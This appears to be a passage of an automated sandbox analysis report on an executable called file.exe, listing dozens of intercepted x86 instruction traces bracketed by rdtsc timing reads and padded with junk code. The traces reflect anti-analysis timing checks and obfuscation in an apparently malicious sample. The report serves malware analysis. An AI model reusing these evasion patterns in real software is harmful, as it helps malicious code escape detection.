                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81EB0 second address: C81F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBA68C246D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FBA68C246D8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b jno 00007FBA68C246DBh 0x00000031 jmp 00007FBA68C246E5h 0x00000036 push 00000000h 0x00000038 mov esi, dword ptr [ebp+122D32DEh] 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007FBA68C246D8h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000016h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a pushad 0x0000005b jo 00007FBA68C246DCh 0x00000061 sbb eax, 7D999BD8h 0x00000067 popad 0x00000068 mov esi, 2DDC87FBh 0x0000006d xchg eax, ebx 0x0000006e jng 00007FBA68C246DEh 0x00000074 push eax 0x00000075 jp 00007FBA68C246E0h 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e popad 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83EF6 second address: C83F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jne 00007FBA693F36B6h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jo 00007FBA693F36C4h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83F10 second address: C83F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3A2BB second address: C3A2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3A2BF second address: C3A2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3A2C7 second address: C3A2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA693F36C9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3A2E4 second address: C3A330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007FBA68C246D6h 0x00000012 jnp 00007FBA68C246D6h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBA68C246E6h 0x00000022 push esi 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3A330 second address: C3A335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83234 second address: C8323A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83CA4 second address: C83CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8323A second address: C8323E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C882E1 second address: C882FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FBA693F36B6h 0x00000009 js 00007FBA693F36B6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FBA693F36B8h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C847CF second address: C847D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83CA9 second address: C83CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBA693F36B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83CBE second address: C83CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C884D1 second address: C884D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83CC3 second address: C83CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA68C246E3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A2B3 second address: C8A2D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A2D7 second address: C8A2DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8D21A second address: C8D230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36C1h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A2DB second address: C8A2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8D230 second address: C8D23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBA693F36B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A2E1 second address: C8A2FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA68C246E7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A2FC second address: C8A383 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bl, 2Fh 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FBA693F36B8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c or dword ptr [ebp+122D1C26h], edi 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 add dword ptr [ebp+1245288Bh], eax 0x0000003f add dword ptr [ebp+122D2774h], esi 0x00000045 mov eax, dword ptr [ebp+122D1325h] 0x0000004b mov dword ptr [ebp+122D188Fh], edx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007FBA693F36B8h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 0000001Ah 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d mov dword ptr [ebp+122D18B2h], eax 0x00000073 nop 0x00000074 push ebx 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8D322 second address: C8D32C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA68C246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A383 second address: C8A394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jg 00007FBA693F36B6h 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C926B3 second address: C926E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBA68C246D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f sub ebx, dword ptr [ebp+122D32E5h] 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2596h], ecx 0x0000001d push 00000000h 0x0000001f or ebx, 527A79E4h 0x00000025 mov ebx, dword ptr [ebp+122D2D40h] 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jno 00007FBA68C246D6h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C926E9 second address: C926EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95528 second address: C95533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA68C246D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95533 second address: C95539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95539 second address: C9553D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9553D second address: C955CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007FBA693F36CAh 0x0000000f nop 0x00000010 jmp 00007FBA693F36BAh 0x00000015 mov ebx, 64098FD9h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007FBA693F36B8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 jc 00007FBA693F36B6h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007FBA693F36B8h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D398Fh], edx 0x0000005e xchg eax, esi 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 push edx 0x00000063 pop edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C957C8 second address: C957D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA68C246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C957D2 second address: C957DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FBA693F36B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C957DC second address: C957E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99D19 second address: C99DAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA693F36C9h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FBA693F36B8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov ebx, 7B102664h 0x0000002e push 00000000h 0x00000030 jne 00007FBA693F36C9h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007FBA693F36B8h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 movsx ebx, si 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push ebx 0x00000059 pushad 0x0000005a popad 0x0000005b pop ebx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99EE4 second address: C99F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FBA68C246D8h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 add edi, dword ptr [ebp+122D1A4Dh] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov di, 332Dh 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b jng 00007FBA68C246DAh 0x00000031 mov di, 4CC0h 0x00000035 mov eax, dword ptr [ebp+122D0DFDh] 0x0000003b or edi, 08A77B76h 0x00000041 push FFFFFFFFh 0x00000043 movzx ebx, cx 0x00000046 push eax 0x00000047 pushad 0x00000048 js 00007FBA68C246DCh 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA0AE2 second address: CA0AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA0AE6 second address: CA0AF9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBA68C246D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA0AF9 second address: CA0B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA693F36B6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007FBA693F36B6h 0x00000014 je 00007FBA693F36B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA0C52 second address: CA0C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA59AB second address: CA59B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AC4 second address: CA5ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5ACA second address: CA5AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FBA693F36B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AD8 second address: CA5AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA68C246E9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AFB second address: CA5B05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5B05 second address: CA5B6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c ja 00007FBA68C246D8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnp 00007FBA68C246EDh 0x0000001d jmp 00007FBA68C246E7h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 jmp 00007FBA68C246E8h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBA68C246E3h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5B6B second address: CA5B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5C2B second address: ACDBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 49A88FBAh 0x0000000c jmp 00007FBA68C246E0h 0x00000011 push dword ptr [ebp+122D07CDh] 0x00000017 jc 00007FBA68C246DEh 0x0000001d pushad 0x0000001e mov eax, esi 0x00000020 mov si, 1729h 0x00000024 popad 0x00000025 jmp 00007FBA68C246E7h 0x0000002a call dword ptr [ebp+122D2681h] 0x00000030 pushad 0x00000031 jbe 00007FBA68C246E6h 0x00000037 jmp 00007FBA68C246E0h 0x0000003c pushad 0x0000003d mov esi, 654C5003h 0x00000042 push ecx 0x00000043 jmp 00007FBA68C246DAh 0x00000048 pop edx 0x00000049 popad 0x0000004a xor eax, eax 0x0000004c sub dword ptr [ebp+122D20AEh], esi 0x00000052 mov edx, dword ptr [esp+28h] 0x00000056 mov dword ptr [ebp+122D20AEh], ebx 0x0000005c mov dword ptr [ebp+122D2D78h], eax 0x00000062 pushad 0x00000063 adc ax, D371h 0x00000068 sub dx, 7D5Bh 0x0000006d popad 0x0000006e mov esi, 0000003Ch 0x00000073 sub dword ptr [ebp+122D309Ch], edi 0x00000079 add esi, dword ptr [esp+24h] 0x0000007d sub dword ptr [ebp+122D1A4Dh], edi 0x00000083 lodsw 0x00000085 add dword ptr [ebp+122D1A4Dh], esi 0x0000008b add eax, dword ptr [esp+24h] 0x0000008f jl 00007FBA68C246DCh 0x00000095 mov dword ptr [ebp+122D20AEh], esi 0x0000009b mov ebx, dword ptr [esp+24h] 0x0000009f add dword ptr [ebp+122D2850h], ebx 0x000000a5 nop 0x000000a6 jc 00007FBA68C246E4h 0x000000ac pushad 0x000000ad push eax 0x000000ae push edx 0x000000af rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BEBF second address: C3BED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36BEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAE39 second address: CAAE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAE3D second address: CAAE4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FBA693F36B6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAE4B second address: CAAEA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DEh 0x00000007 jmp 00007FBA68C246E6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBA68C246E4h 0x0000001b jmp 00007FBA68C246E8h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAEA7 second address: CAAEBC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBA693F36B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FBA693F36B8h 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB18F second address: CAB193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB5C3 second address: CAB5D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB5D1 second address: CAB5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBA68C246D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB5DB second address: CAB605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBA693F36C3h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB76F second address: CAB773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB13D0 second address: CB13D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0065 second address: CB0089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FBA68C246DFh 0x0000000b jnl 00007FBA68C246D8h 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0089 second address: CB00A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBA693F36C1h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB00A5 second address: CB00AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB01E8 second address: CB01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB01EE second address: CB01F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB01F2 second address: CB01FC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA693F36B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB01FC second address: CB020E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FBA68C246DDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB03A3 second address: CB03B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FBA693F36BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB07DD second address: CB07E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB07E3 second address: CB07EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB07EB second address: CB0811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FBA68C246E5h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007FBA68C246D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0B07 second address: CB0B0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1238 second address: CB1248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1248 second address: CB124E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB82AB second address: CB82C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
